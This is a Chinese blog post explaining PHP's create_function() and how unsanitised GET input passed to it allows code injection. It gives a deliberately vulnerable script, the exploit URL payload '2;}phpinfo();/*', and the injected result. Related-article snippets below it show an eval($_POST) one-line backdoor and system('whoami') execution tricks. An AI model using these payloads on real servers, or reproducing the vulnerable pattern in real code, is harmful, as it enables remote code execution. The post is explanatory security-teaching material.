PHP create_function()代码注入 (执行脚本函数)

最新推荐文章于 2024-07-02 17:06:00 发布
最新推荐文章于 2024-07-02 17:06:00 发布
阅读量1.1w 收藏 1
点赞数
分类专栏: php 文章标签: php

第一部分:介绍php函数 create_function():

string create_function    ( string $args   , string $code   )

string $args 变量部分

string $code 方法代码部分

举例:

1
create_function( '$fname' , 'echo $fname."Zhang"' )

类似于:

1
2
3
function  fT( $fname ) {
   echo  $fname . "Zhang" ;
}

举一个官方提供的例子:

1
2
3
4
5
6
7
8
9
<?php
$newfunc  = create_function( '$a,$b' 'return "ln($a) + ln($b) = " . log($a * $b);' );
echo  "New anonymous function: $newfunc" ;
echo  $newfunc (2, M_E) . "
";
// outputs
// New anonymous function: lambda_1
// ln(2) + ln(2.718281828459) = 1.6931471805599
?>

第二部分:如何利用create_function()代码注入

测试环境版本:

apache +php 5.2、apache +php 5.3

有问题的代码:

1
2
3
4
5
6
7
8
9
10
11
12
<?php
//02-8.php?id=2;}phpinfo();/*
$id = $_GET [ 'id' ];
$str2 = 'echo  ' . $a . 'test' . $id . ";" ;
echo  $str2 ;
echo  "<br/>" ;
echo  "==============================" ;
echo  "<br/>" ;
$f1  = create_function( '$a' , $str2 );
echo  "<br/>" ;
echo  "==============================" ;
?>

利用方法:

http://localhost/libtest/02-8.php?id=2;}phpinfo();/*

实现原理:

由于id=2;}phpinfo();/*

执行函数为:

1
2
3
4
5
6
7
8
9
10
源代码:
function  fT( $a ) {
   echo  "test" . $a ;
}
 
注入后代码:
function  fT( $a ) {
   echo  "test" ;}
   phpinfo();/*; //此处为注入代码。
}


测试效果:

wKioL1bG013BIm6xAAF_Ztvt0MU639.png

峻峰飞阳
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
oracle11G密码策略,Oracle11g R2创设PASSWORD_VERIFY_FUNCTION对应密码复杂度验证函数步骤...
weixin_32149443的博客
04-03 1620
Oracle11g R2创建PASSWORD_VERIFY_FUNCTION对应密码复杂度验证函数步骤Oracle11g R2创建PASSWORD_VERIFY_FUNCTION对应密码复杂度验证函数步骤运行测试环境:数据库服务器Oracle Linux 5.8 + Oracle 11g R2数据库相关工具:PL/SQL软件(连接Linux下的Oracle数据库),SecureCRT软件(远程连接...
PHP file_get_contents函数读取远程数据超时的解决方法
12-18
PHP编程中,`file_get_contents` 是一个非常实用的内置函数,用于读取文件或者URL的内容。然而,在网络环境不稳定或目标服务器响应慢的情况下,`file_get_...理解这些技巧将有助于编写更健壮和高效的PHP代码
PHP create_function()代码注入
weixin_33965305的博客
02-19 509
第一部分:介绍php函数 create_function():string create_function ( string $args , string $code )string $args 变量部分string $code 方法代码部分举例:create_function('$fname','echo$fname."Zhang"')类似于:func...
creat_function()代码注入
7hinkSource的博客
09-10 359
creat_function($args,$code),创建匿名函数,$args为变量,$code为执行代码 <?php $id = $_GET['id']; $str = 'echo '.$id.';'; $ft = creat_function('$id',$str); echo $ft; ?> 相当于构造一个函数 function ft($id){ echo $id; } $id是可控参数,构造$id,执行相关操作。 http://127.0.0.1/a0test.php?id=
代码审计+ php 特性 +create_function代码注入 绕过
最新发布
qq_52579508的博客
07-02 569
一道道if 来分析。
php create_function 需要开启什么模块,PHP create_function()代码注入
weixin_34882814的博客
03-16 161
第一部分:介绍php函数 create_function():string create_function( string $args, string $code)string $args变量部分string $code 方法代码部分举例:create_function("$fname","echo$fname."Zhang"")类似于:functionfT($fname){echo$fn...
create function php,PHP create_function 用法 手册 | 示例代码
weixin_36472962的博客
03-09 217
In the process of migrating a PHP4 codebase to PHP5, I ran into a peculiar problem. In the library, every class was derived from a generic class called 'class_container'. 'class_container' contained a...
PHP代码create_function()函数
snowlyzz的博客
10-05 4362
create_function 详解
2021-8-23 [BJDCTF2020]EzPHP 知识点:php超全局变量,create_function,各种php的bypass
m0_51326092的博客
08-23 327
首先,本文借鉴的大老婆博客如下: 出题大佬博客,详细讲解了各种知识点 一位大佬的详细解题过程(偷懒,自己就不写了) 就简单写写(赋值粘贴)一些比较重要的知识点(× create_function函数: 看似平平无常,却暗藏杀机 <?php $myFunc = create_function('$a, $b', 'return($a+$b);}eval($_POST['Y1ng']);\\'); ?> 执行后,很明显有一句话注入,可以拿到权限 function myFunc($a, $b){
Oracle 11gR2创建PASSWORD_VERIFY_FUNCTION对应密码复杂度验证函数步骤.doc
09-30
例如,你可以创建一个名为`资源文件名`的配置,设置`FAILED_LOGIN_ATTEMPTS`为10,`PASSWORD_LIFE_TIME`为180天,并且使用`PASSWORD_VERIFY_FUNCTION`指定我们即将创建的验证函数`verify_function_11G`。 ```sql ...
PHP实现动态执行代码的方法
10-22
动态执行代码通常意味着用户可以输入代码片段,然后程序将其作为PHP代码执行,并返回结果。这种技术在某些特定的应用场景中非常有用,例如在在线的代码编辑器、脚本运行器和教学环境中。然而,这种做法需要非常小心...
深入php函数file_get_contents超时处理的方法详解
12-19
这个 `Post()` 函数接受一个URL和一个POST数据数组,然后创建相应的流上下文以执行POST请求。 总之,处理 `file_get_contents()` 超时问题的关键在于理解并利用流上下文的设置,尤其是 `'timeout'` 参数。通过适当...
全网最全的 php8 新特性
国内某知名游戏公司小菜鸡工程师
06-01 6012
全世界最好的语言又升级了,快来看看有哪些新特性
php 命名空间 create_function,PHP create_function()注入命令执行漏洞
weixin_39716044的博客
03-21 413
0x00 create_function()介绍create_function()创建匿名函数string create_function ( string $args , string $code )stringcode 方法代码部分举例:create_function('$name','echo $name."A"')类似于:function name($name) {echo ...
代码审计——命令执行
1stPeak's Blog
06-15 1100
前言 最近几天简单复习了代码审计中的命令执行,这篇为自我复现时的一些总结 一、代码执行的几种方式 1、${}执行代码 例: <?php ${system('whoami')}; ${phpinfo()}; ?> 2、eval 例: <?php eval('echo "xx";'); echo "<br/>"; eval('system("whoami");'); echo "<br/>"; eval('phpinfo();'); ?> 3、assert
@php一句话猥琐流搞法
fengling132的专栏
04-20 1192
在渗透中常常遇到拦截eval的,所以 这种形式的会被拦截 常见的是变成 base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4=) 这种形式可以绕过,另外还有其他形式         今天见一比较怪的东西:web杀毒。v1.0。点。心想是不是谁有跟云扯上了。   完了才知道是个webshell扫描工具。各位前辈把web后门弄的死
php create_function()产生的漏洞
yy2013
11-03 3020
create_function(‘参数’,’函数体’):官方example:<?php $newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);'); echo "New anonymous function: $newfunc\n"; echo $newfunc(2, M_E) . "\n";
create_function() 代码注入,,PHP7.2竟然还存在
热门推荐
烟敛寒林的博客
05-09 1万+
第一部分:php函数 create_function() 介绍 理论: create_function()主要用来创建匿名函数,有时候匿名函数可以发挥它的作用。 stringcreate_function (string$args ,string$code ) string$args变量部分 string$code 方法代码部分 举例: create...
那些强悍的PHP一句话后门
大方子
08-06 9452
以一个学习的心态来对待PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。 强悍的PHP一句话后门 这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。 利用404页面隐藏PHP小马   PHP   1 2 3 4 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值